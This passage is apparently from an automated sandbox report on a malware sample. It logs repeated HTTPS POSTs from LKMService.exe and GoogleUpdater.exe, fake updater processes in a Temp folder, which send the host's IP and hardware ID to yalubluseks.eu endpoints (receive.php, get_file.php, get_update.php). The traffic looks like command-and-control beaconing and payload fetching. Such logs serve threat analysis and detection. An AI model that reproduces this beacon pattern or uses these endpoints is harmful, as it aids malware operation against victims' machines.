                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:14 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:14 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM4oGdDYNSTd4rX%2BHlu5KkAySBnzuur5cLnAbWDs7nFu3OeRccEWGylxK9mp%2BoSHHCV0gbAXNX5KFIxzDqe0DnvIvxAs1V7pM55iyuSuVuF2qBsZCPHrEjNT0sbuTsZr0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9d24afe430d-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          119192.168.2.658671172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:15 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:15 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:15 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:15 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:15 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJG%2FMnSmMLcQGM09pkA%2FTbnw%2BC3w7FwKZwFBqP7ZUQ68ih%2BFs11oe9Gp%2BkhYnSsMsFp6pkyyjiAsrAtm1DsdDRRt1SAiinbExvsp%2BCYdUN5OdMfEeOYqg2nXfS3J32QpfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9daea2c4223-EWR
                                                                                                                                                                                                                                          2024-10-02 12:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          120192.168.2.658672172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:16 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:16 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:16 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:16 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:16 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZuuIcZLderEZdDxQJk7RNwnNqEZe6Q9bVFAc%2F%2BnivUtq4uInyI203tEGlnCyXntY3I38Mccs%2BhVriZe7f4IrUnTqxlZcc5c5EKGKxO6nxupaNQKhY3ezIMVUhrcm%2BVljw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9e0bc89429b-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          121192.168.2.658674172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:18 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:18 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:18 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:18 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:18 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1OVvhOukVFFiC3jnrTSfApNsyZDY8GeLAw8vA%2Fia3Q348DkosahUQP1g%2F%2Ft6qUiCuHRSi%2BIAvKexFZLeUSyAkkFEhE0skOW%2B2ID4lWAkbwSiuAMdpqQTqbWJlXcArdK6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9eedeb88c63-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          122192.168.2.658676172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:19 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Upm4MiFFqQoYXywehcCtCR1o9CIlQjBlTMizppR9FlWS22M1IXgWyHYBeJHtoR8urXHQarP15duCxBP%2BZ550WKItzvt1o%2BxOT0TRb3ijp%2B3e0FShdMmJIMD1tWC8kkaYOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9f489ac4225-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          123192.168.2.658678172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:19 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:20 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:20 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:20 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5StJEOK4sDJ1DTYbHUuEefcgEsBazlZFqtAcX%2F09rFmPb6t4HXwiJQB7TOTyml%2BkTHApGOi%2BXsZ0XCSJVSxjffDTpRpxDc7khzs%2FPHv%2BfqG8OUy2OOziGl7x%2FMXfKu4nvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9f80a260c9c-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          124192.168.2.658680172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:20 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:20 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:20 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:21 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:21 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsdUE1JvNTgDBYjzct65CuWAv5IrE%2Fr8J9WU8gjW5SE4A8WfWnmPNtQk%2B01VB4ULxXfy1d6P4%2FWdVxAnUfVtMbnOcY0kuh8Pib2zEd1ftb0o2renxTIq0qDYek%2F33tBHMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9fd5fa07cfc-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          125192.168.2.658684172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:30 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:31 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:31 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:31 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FjEevSlmCcaaF9FSq73C4aANJng%2BFYHozDKLsMwUysZ6xIep5WFY7VTN2KHbhpM1AYsND9nffygACZCfJWO1GO5XzthfbEpjbYonSLsijwchKPxhIK%2F9NcF8XCeyr24HA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca3c9ffe42a6-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          126192.168.2.658688172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:35 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:35 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:35 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:35 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:35 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YjcCpvZmPO2250MxT%2Bgmt7AZyKpvNxcr2t2U91a7yBUDIsv8SIvDQUCNwC3YkLHmJqW0sJYMha2Q9vLlgeLvQwunpGA%2B%2FyOnBnaqhOtt8oye3KEGwsbCOExfdj1Iftmkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca578bfe43f7-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          127192.168.2.658690172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:36 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:36 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:36 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:37 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:37 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVw3GUAg5ClwaKIxRYwkVlXWbJfv1PrIf5Qv4Deyl2L%2FTe%2BR3d6OMpbs9quCKvP53Yy8n%2BcQ51CBpfN36fsJWIkufeicFB2sqXismUKQiB2gJJAbZpQdPK3TLmxVvwW8KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca60db3343b3-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          128192.168.2.658691172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:37 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          129192.168.2.658693172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:44 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:45 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:45 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          130192.168.2.658695172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:49 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:49 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKmLysOhqyx3pIBqR1Vy00ygKAX7ejYFcVRBH9T7aPSbGpo3HGPRjgkDp4CSCQvWb3xEn8IEQpvEp4zZJapdqdlVESM23Rx4G9A4xGkY8is5yeaKzlKs6jkWcNU%2F74Gq6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cab35ae77cac-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          131192.168.2.658697172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:50 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
